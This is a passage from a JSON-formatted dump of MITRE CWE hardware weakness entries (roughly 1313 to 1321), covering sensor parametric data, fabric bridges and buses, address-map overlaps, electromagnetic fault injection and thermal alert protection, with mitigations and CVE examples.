disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Integration","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-08-06"}}},"1314":{"attr":{"@_ID":"1314","@_Name":"Missing Write Protection for Parametric Data Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.","Extended_Description":{"xhtml:p":["Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software.","The limit values are generally programmed in standard units for the type of value being read. However, the hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits.","While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1299","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The lack of a requirement to protect parametric values may contribute to this weakness."},{"Phase":"Implementation","Note":"The lack of parametric value protection may be a cause of this weakness."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["Quality Degradation","DoS: Resource Consumption (Other)"],"Likelihood":"High","Note":"Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value.\\n\\t\\t\\t\\t\\t\\t\\tSuch a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device.","A ring, oscillator-based temperature sensor will generally report the sensed value as\\n\\t\\t\\t\\t\\t\\t\\toscillator frequency rather than degrees centigrade. The temperature sensor will have\\n\\t\\t\\t\\t\\t\\t\\tcalibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade.","Consider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and\\n\\t\\t\\t\\t\\t\\t\\tis not modifiable by software. If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down.","The thermal sensor calibration values are programmable through registers that are exposed to system software.\\n\\t\\t\\t\\t\\t\\tThese registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed\\n\\t\\t\\t\\t\\t\\t\\ttemperature is always zero."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, \\n\\t\\t\\t\\t\\t\\t\\tpreventing this method of manipulating the temperature."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}}],"Body_Text":"This weakness may be addressed by preventing access to a and b."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-8252","Description":"Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8252"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1082"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-14"}}},"1315":{"attr":{"@_ID":"1315","@_Name":"Improper Setting of Bus Controlling Capability in Fabric End-point","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.","Extended_Description":{"xhtml:p":"To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"Implementation","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"System Configuration","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit (\u201cPMIC\u201d), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals.","Body_Text":["The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0. There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders.","Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security.","Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1135"}},{"attr":{"@_External_Reference_ID":"REF-1136"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1316":{"attr":{"@_ID":"1316","@_Name":"Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.","Extended_Description":{"xhtml:p":["Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected.","Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Review address map in specification to see if there are any overlapping ranges.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Negative testing of access control on overlapped ranges.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap."},{"Phase":"Implementation","Description":"Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion."},{"Phase":"Testing","Description":"Validate mitigation actions with robust testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB. Registers and other assets that are not security-sensitive require 40KB. One range register is configured to program 4KB to protect user A\u2019s assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B\u2019s assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range.","Body_Text":["The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data.","Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space. Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-4419","Description":"Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4419"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1137"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1317":{"attr":{"@_ID":"1317","@_Name":"Missing Security Checks in Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master. Similarly, it does not check the hardware identity of the transaction received from the slave interface of the bridge.","Extended_Description":{"xhtml:p":["In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect.","For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"RTL simulation to ensure that bridge-access controls are implemented properly.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Formal verification of bridge RTL to ensure that access control cannot be bypassed.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design includes provisions for access-control checks in the bridge for both upstream and downstream transactions."},{"Phase":"Implementation","Description":"Implement access-control checks in the bridge for both upstream and downstream transactions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus.","Body_Text":["The bridge does not implement the checks and allows reads and writes from all privilege levels.","To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"122"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1138"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1318":{"attr":{"@_ID":"1318","@_Name":"Missing Support for Security Features in On-chip Fabrics or Buses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control.","Extended_Description":{"xhtml:p":"Certain on-chip fabrics and buses, especially simple and low-power buses, do not support security features. Apart from data transfer and addressing ports, some fabrics and buses do not have any interfaces to transfer privilege, immutable identity, or any other security attribute coming from the bus master. Similarly, they do not have dedicated signals to transport security-sensitive data from slave to master, such as completions for certain types of transactions. Few other on-chip fabrics and buses support security features and define specific interfaces/signals for transporting security attributes from master to slave or vice-versa. However, including these signals is not mandatory and could be left unconfigured when generating the register-transfer-level (RTL) description for the fabric. Such fabrics or buses should not be used to transport any security attribute coming from the bus master. In general, peripherals with security assets should not be connected to such buses before the transaction from the bus master reaches the bus, unless some form of access control is performed at a fabric bridge or another intermediate module."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review the fabric specification and ensure that it contains signals to transfer security-sensitive signals.","Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":"Lack of security features can also be confirmed through manual RTL review of the fabric RTL.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"If fabric does not support security features, implement security checks in a bridge or any component that is between the master and the fabric. Alternatively, connect all fabric slaves that do not have any security assets under one such fabric and connect peripherals with security assets to a different fabric that supports security features."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Several systems on chips (SoCs) use the Advanced-Microcontroller Bus Architecture (AMBA) Advanced-Peripheral Bus (APB) protocol. APB is a simple, low-power bus and uses the PPROT[2:0] bits to indicate the security state of the bus masters ;PPROT[0] indicates privilege, PPROT[1] indicates secure/non-secure transaction, and PPROT[2] indicates instruction/data. Assume that there is no fabric bridge in the SoC. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["The APB bus is used to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. For a CPU supporting 8 potential identities (each with varying privilege levels), 16 types of outgoing transactions can be made--8 read transactions with each supported privilege level and 8 write transactions with each supported privilege level.","Since APB PPROT can only support up to 8 transaction types, access-control checks cannot be performed on transactions going to the slaves at the right granularity for all possible transaction types. Thus, potentially, user code running on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device, resulting in permanent denial of service.","In this scenario, only peripherals that need access protection from 8 of the 16 possible transaction types can be connected to the APB bus. Peripherals that require protection from the remaining 8 transaction types can be connected to a different APB bus. Alternatively, a bridge could be implemented to handle such complex scenarios before forwarding traffic to the APB bus."]},{"Intro_Text":"The Open-Core-Protocol (OCP) fabric supports two configurable, width-optional signals for transporting security attributes: MReqInfo and SRespInfo. MReqInfo is used to transport security attributes from bus master to slave, and SRespInfo is used to transport security attributes from slave to bus master. An SoC uses OCP to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. One of the bus masters, the CPU, reports the privilege level (user or super user) in addition to the unique identity. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["Since MReqInfo and SRespInfo are not mandatory, these signals are not configured when autogenerating RTL for the OCP fabric. Thus, the fabric cannot be used to transport security attributes from bus masters to slave.","Code running at user-privilege level on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device and cause permanent denial of service.","To address this, configure the fabric to include MReqInfo and SRespInfo signals and use these to transport security identity and privilege level to perform access-control checks at the slave interface."]}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1139"}},{"attr":{"@_External_Reference_ID":"REF-1140"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-20"}}},"1319":{"attr":{"@_ID":"1319","@_Name":"Improper Protection against Electromagnetic Fault Injection (EM-FI)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed.","Extended_Description":{"xhtml:p":"Electromagnetic fault injection may allow an attacker to locally and dynamically modify the signals (both internal and external) of an integrated circuit. EM-FI attacks consist of producing a local, transient magnetic field near the device, inducing current in the device wires. A typical EMFI setup is made up of a pulse injection circuit that generates a high current transient in an EMI coil, producing an abrupt magnetic pulse which couples to the target producing faults in the device, which can lead to:","xhtml:ul":{"xhtml:li":["Bypassing security mechanisms such as secure JTAG or Secure Boot","Leaking device information","Modifying program flow","Perturbing secure hardware modules (e.g. random number generators)"]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Redundancy \u2013 By replicating critical operations and comparing the two outputs can help indicate whether a fault has been injected.","2. Error detection and correction codes - Gay, Mael, et al. proposed a new scheme that not only detects faults injected by a malicious adversary but also automatically corrects single nibble/byte errors introduced by low-multiplicity faults.","3. Fail by default coding - When checking conditions (switch or if) check all possible cases and fail by default because the default case in a switch (or the else part of a cascaded if-else-if construct) is used for dealing with the last possible (and valid) value without checking. This is prone to fault injection because this alternative is easily selected as a result of potential data manipulation [REF-1141].","4. Random Behavior - adding random delays before critical operations, so that timing is not predictable.","5. Program Flow Integrity Protection \u2013 The program flow can be secured by integrating run-time checking aiming at detecting control flow inconsistencies. One such example is tagging the source code to indicate the points not to be bypassed [REF-1147].","6. Sensors \u2013 Usage of sensors can detect variations in voltage and current.","7. Shields \u2013 physical barriers to protect the chips from malicious manipulation."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In many devices, security related information is stored in fuses. These fuses are loaded into shadow registers at boot time. Disturbing this transfer phase with EM-FI can lead to the shadow registers storing erroneous values potentially resulting in reduced security.","Body_Text":"Colin O\'Flynn has demonstrated an attack scenario which uses electro-magnetic glitching during booting to bypass security and gain read access to flash, read and erase access to shadow memory area (where the private password is stored). Most devices in the MPC55xx and MPC56xx series that include the Boot Assist Module (BAM) (a serial or CAN bootloader mode) are susceptible to this attack. In this paper, a GM ECU was used as a real life target. While the success rate appears low (less than 2 percent), in practice a success can be found within 1-5 minutes once the EMFI tool is setup. In a practical scenario, the author showed that success can be achieved within 30-60 minutes from a cold start."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1141"}},{"attr":{"@_External_Reference_ID":"REF-1142"}},{"attr":{"@_External_Reference_ID":"REF-1143"}},{"attr":{"@_External_Reference_ID":"REF-1144"}},{"attr":{"@_External_Reference_ID":"REF-1145"}},{"attr":{"@_External_Reference_ID":"REF-1146"}},{"attr":{"@_External_Reference_ID":"REF-1147"}}]},"Notes":{"Note":{"#text":"This entry is attack-oriented and may require significant modification in future versions, or even deprecation. It is not clear whether there is really a design \\"mistake\\" that enables such attacks, so this is not necessarily a weakness and may be more appropriate for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Sebastien Leger, Rohini Narasipur","Submission_Organization":"Bosch","Submission_Date":"2020-08-27"}}},"1320":{"attr":{"@_ID":"1320","@_Name":"Improper Protection for Out of Bounds Signal Level Alerts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.","Extended_Description":{"xhtml:p":["Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS. \\n\\t\\t\\t\\tModification of these limits may be protected by hardware mechanisms.","When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling.","Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS).\\n\\t\\t\\t\\tThese alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","Reduce Reliability","Unexpected State"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value.\\n\\t\\t\\t\\t\\t\\t\\tIf the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor.","The processor, upon getting the alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode."]},"Example_Code":[{"#text":"The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin.","attr":{"@_Nature":"bad"}},{"#text":"The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS.","attr":{"@_Nature":"good"}}],"Body_Text":"Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1321":{"attr":{"@_ID":"1321","@_Name":"Improperly Controlled Modification of Object Prototype Attributes 